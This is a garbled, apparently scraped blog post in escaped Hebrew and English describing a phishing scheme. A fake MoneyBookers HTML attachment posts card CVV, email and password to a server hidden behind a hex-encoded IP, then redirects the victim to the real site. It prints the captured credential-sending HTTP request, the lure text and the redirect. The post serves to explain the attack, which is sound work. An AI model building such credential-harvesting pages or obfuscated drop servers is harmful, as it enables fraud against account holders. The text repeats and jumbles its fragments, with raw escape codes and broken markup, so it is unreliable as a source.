\nThis measure has been adopted to prevent personal information theft and data loss.<\/strong>
\n————————————————-
\n\u00a9 Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
\nRegistered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
\nNone of the information contained in this website constitutes, nor should be construed as Financial Advice.
\nInternal complaint handling procedures can be requested by contacting our Customer Service Department.\n<\/div>\n
2. \u05d4\u05e7\u05d5\u05d1\u05e5 \u05d4\u05de\u05e6\u05d5\u05e8\u05e3 \u05d4\u05d5\u05d0 \u05e7\u05d5\u05d1\u05e5 HTML \u05e8\u05d2\u05d9\u05dc \u05dc\u05d7\u05dc\u05d5\u05d8\u05d9\u05df, \u05e9\u05dc\u05d0 \u05de\u05db\u05d9\u05dc \u05e9\u05d5\u05dd \u05d3\u05d1\u05e8 \u05e9\u05d9\u05d4\u05d9\u05d4 \u05e7\u05dc \u05dc\u05d6\u05d4\u05d5\u05ea \u05d1\u05e1\u05e8\u05d9\u05e7\u05d4 \u05d0\u05d5\u05d8\u05d5\u05de\u05d8\u05d9\u05ea (\u05d4\u05d9\u05d5\u05e8\u05d9\u05e1\u05d8\u05d9\u05ea), \u05d5\u05e0\u05e8\u05d0\u05d4 \u05db\u05de\u05d5 \u05d3\u05e3 \u05e8\u05e9\u05de\u05d9 \u05e9\u05dc Moneybookers,
\n\u05e9\u05de\u05d8\u05e8\u05ea\u05d5 \u05dc\u05de\u05e0\u05d5\u05e2 \u05d2\u05e0\u05d9\u05d1\u05ea \u05d6\u05d4\u05d5\u05ea, \u05d5\u05db\u05d9\u05d1\u05d5\u05e1 \u05db\u05e1\u05e4\u05d9\u05dd. \u05de\u05d8\u05e8\u05d5\u05ea \u05e8\u05d0\u05d5\u05d9\u05d5\u05ea \u05dc\u05dc\u05d0 \u05e1\u05e4\u05e7, \u05de\u05d4 \u05e9\u05e2\u05d5\u05d6\u05e8 \u05dc\u05d4\u05d5\u05e8\u05d9\u05d3 \u05d0\u05ea \u05d4\u05d4\u05d2\u05e0\u05d5\u05ea \u05d4\u05e4\u05e1\u05d9\u05db\u05d5\u05dc\u05d5\u05d2\u05d9\u05d5\u05ea \u05e9\u05dc \u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05e9\u05e8\u05d5\u05e6\u05d4 \u05dc\u05e2\u05d6\u05d5\u05e8.<\/p>\n
\u05d4\u05d3\u05e3 \u05de\u05e7\u05e9\u05e8 \u05dc\u05dc\u05d5\u05d2\u05d5\u05d0\u05d9\u05dd \u05d5\u05e7\u05d1\u05e6\u05d9\u05dd \u05de\u05d4\u05d0\u05ea\u05e8 \u05e9\u05dc Moneybookers, \u05de\u05d4 \u05e9\u05de\u05e2\u05dc\u05d4 \u05d0\u05ea \u05e8\u05de\u05ea \u05d4\u05d0\u05de\u05d9\u05e0\u05d5\u05ea \u05d4\u05d5\u05d9\u05d6\u05d5\u05d0\u05dc\u05d9\u05ea \u05e9\u05dc\u05d5.<\/p>\n 3. \u05d1\u05e8\u05d2\u05e2 \u05e9\u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05de\u05de\u05dc\u05d0 \u05d0\u05ea \u05d4\u05e4\u05e8\u05d8\u05d9\u05dd \u05d5\u05dc\u05d5\u05d7\u05e5 \u05e2\u05dc submit, \u05d4\u05e0\u05ea\u05d5\u05e0\u05d9\u05dd \u05e0\u05e9\u05dc\u05d7\u05d9\u05dd \u05dc\u05e9\u05e8\u05ea \u05e9\u05dc \u05e9\u05dc \u05d4\u05e0\u05d5\u05db\u05dc\u05d9\u05dd, \u05e9\u05e9\u05d5\u05de\u05e8 \u05d0\u05d5\u05ea\u05dd \u05d5\u05de\u05d7\u05d6\u05d9\u05e8 HTTP 302, \u05e9\u05de\u05e4\u05e0\u05d4 \u05dc\u05e9\u05e8\u05ea \u05e9\u05dc MoneyBookers:<\/p>\n day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=<\/p>\n HTTP\/1.1 302 Found<\/strong> \u05d9\u05e9 \u05db\u05de\u05d4 \u05d3\u05d1\u05e8\u05d9\u05dd \u05e9\u05db\u05d3\u05d0\u05d9 \u05dc\u05e9\u05d9\u05dd \u05d0\u05dc\u05d9\u05d4\u05dd \u05dc\u05d1 (\u05de\u05d5\u05d3\u05d2\u05e9\u05d9\u05dd). \u05d6\u05d3\u05d5\u05e0\u05d9. Phishers have come up with a new method to conceal well from non-technical users the essence of what's happening. For security reasons we have sent the message as an attachment file. 2. The attached HTML is a normal HTML file that does not contain anything that will be easy to detect in an automatic (heuristic) scan, and looks like an official MoneyBookers page that is supposed to help prevent identity theft and money laundering. worthy causes with no doubt – that help lower the user mental defenses that wants to help.<\/p>\n
<\/a><\/p>\n
\nHost: 0x9f.0xe2.0x3a.0x88<\/strong>
\nUser-Agent: Mozilla\/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko\/20080129 Iceweasel\/2.0.0.12 (Debian-2.0.0.12-1)
\nAccept: text\/xml,application\/xml,application\/xhtml+xml,text\/html;q=0.9,text\/plain;q=0.8,image\/png,*\/*;q=0.5
\nAccept-Language: en-us,en;q=0.5
\nAccept-Encoding: gzip,deflate
\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
\nKeep-Alive: 300
\nConnection: keep-alive
\nCookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710
\nContent-Type: application\/x-www-form-urlencoded
\nContent-Length: 72<\/p>\n
\nDate: Wed, 02 Apr 2008 04:13:22 GMT
\nServer: Apache\/2.0.52 (CentOS)
\nX-Powered-By: PHP\/4.3.11
\nLocation: https:\/\/www.moneybookers.com\/app\/help.pl?s=laundering<\/strong>
\nContent-Length: 0
\nConnection: close
\nContent-Type: text\/html; charset=UTF-8\n<\/div>\n
\n* \u05d4\u05db\u05ea\u05d5\u05d1\u05ea \u05e9\u05dc \u05e9\u05e8\u05ea \u05d4\u05d9\u05e2\u05d3 \u05d4\u05d9\u05d0 0x9f.0xe2.0x3a.0x88. \u05d4\u05d3\u05d1\u05e8 \u05d4\u05de\u05d5\u05d6\u05e8 \u05d4\u05d6\u05d4 \u05d4\u05d5\u05d0 \u05db\u05ea\u05d5\u05d1\u05ea IP \u05d1\u05de\u05e1\u05d5\u05d5\u05d4, \u05de\u05d4 \u05e9\u05de\u05e7\u05e9\u05d4 \u05e2\u05dc \u05d4\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05dc\u05d6\u05d4\u05d5\u05ea \u05de\u05d4 \u05e7\u05d5\u05e8\u05d4 \u05e4\u05d4.
\n* \u05d4\u05ea\u05e9\u05d5\u05d1\u05d4 \u05d4\u05d9\u05d0 HTTP 302, \u05e9\u05de\u05e4\u05e0\u05d4 \u05dc\u05e9\u05e8\u05ea \u05d4\u05de\u05d0\u05d5\u05d1\u05d8\u05d7 \u05e9\u05dc MoneyBookers, \u05de\u05d4 \u05e9\u05d2\u05d5\u05e8\u05dd \u05dc\u05de\u05e9\u05ea\u05de\u05e9 \u05dc\u05d7\u05e9\u05d5\u05d1 \u05e9\u05dc\u05e9\u05dd \u05d4\u05d5\u05d0 \u05d4\u05d2\u05d9\u05e2 \u05db\u05e9\u05d4\u05d5\u05d0 \u05dc\u05d7\u05e5 \u05e2\u05dc Submit.<\/p>\n
\n\u05d4\u05d1\u05e2\u05d9\u05d4 \u05e4\u05d4 \u05d4\u05d9\u05d0 \u05e9\u05d0\u05d9 \u05d0\u05e4\u05e9\u05e8 \u05dc\u05de\u05e0\u05d5\u05e2 \u05de\u05d4\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05dc\u05d4\u05e8\u05d9\u05e5 \u05e7\u05d5\u05d1\u05e5 HTML \u05de\u05e7\u05d5\u05de\u05d9, \u05d5\u05de\u05db\u05d9\u05d5\u05d5\u05df \u05e9\u05d4\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05dc\u05d0 \u05d9\u05d3\u05e2\u05d5 \u05e9\u05e2\u05d1\u05d3\u05d5 \u05e2\u05dc\u05d9\u05d4\u05dd \u05dc\u05d0 \u05d9\u05d4\u05d9\u05d5 \u05d4\u05e8\u05d1\u05d4 \u05d3\u05d9\u05d5\u05d5\u05d7\u05d9\u05dd \u05e2\u05dc \u05d4\u05e2\u05e0\u05d9\u05d9\u05df, \u05d5\u05d2\u05dd \u05d0\u05dd \u05d9\u05d4\u05d9\u05d5 \u05e8\u05d5\u05d1\u05dd \u05dc\u05d0 \u05d9\u05e9\u05db\u05d9\u05dc\u05d5 \u05dc\u05d4\u05d1\u05d9\u05df \u05e2\u05dc \u05de\u05d9 \u05dc\u05d4\u05ea\u05dc\u05d5\u05e0\u05df. \u05d5\u05dc\u05db\u05df \u05db\u05dc\u05d9\u05dd \u05d0\u05d5\u05d8\u05d5\u05de\u05d8\u05d9\u05dd \u05db\u05de\u05d5 \u05d6\u05d9\u05d4\u05d5\u05d9 \u05d6\u05d9\u05d5\u05e3 \u05e8\u05e9\u05ea \u05e9\u05dc \u05d3\u05e4\u05d3\u05e4\u05e0\u05d9\u05dd – \u05e9\u05de\u05ea\u05d1\u05e1\u05e1 \u05e2\u05dc \u05e9\u05e8\u05ea \u05de\u05e8\u05db\u05d6\u05d9 \u05e9\u05d0\u05d5\u05e1\u05e3 \u05ea\u05dc\u05d5\u05e0\u05d5\u05ea \u05de\u05d4\u05e8\u05d1\u05d4 \u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd – \u05dc\u05d0 \u05d9\u05e2\u05d1\u05d3\u05d5 \u05db\u05de\u05d5 \u05e9\u05e6\u05e8\u05d9\u05da \u05db\u05d9 \u05dc\u05d0 \u05d9\u05d4\u05d9\u05d5 \u05d4\u05e8\u05d1\u05d4 \u05ea\u05dc\u05d5\u05e0\u05d5\u05ea.<\/p>\n
\nUnlike the usual approach, where the user is pointed to a site owned by the phisher, that looks like the original site (Paypal, Bank of America etc) – this is what really happens with this approach:
\n1. The user receives an email that looks like it came from a real source (in my case from a Paypal like company called MoneyBookers), and that for security reason the real message is attached:<\/p>\n
\nThis measure has been adopted to prevent personal information theft and data loss.<\/strong>
\n————————————————-
\n\u00a9 Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
\nRegistered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
\nNone of the information contained in this website constitutes, nor should be construed as Financial Advice.
\nInternal complaint handling procedures can be requested by contacting our Customer Service Department. <\/p>\n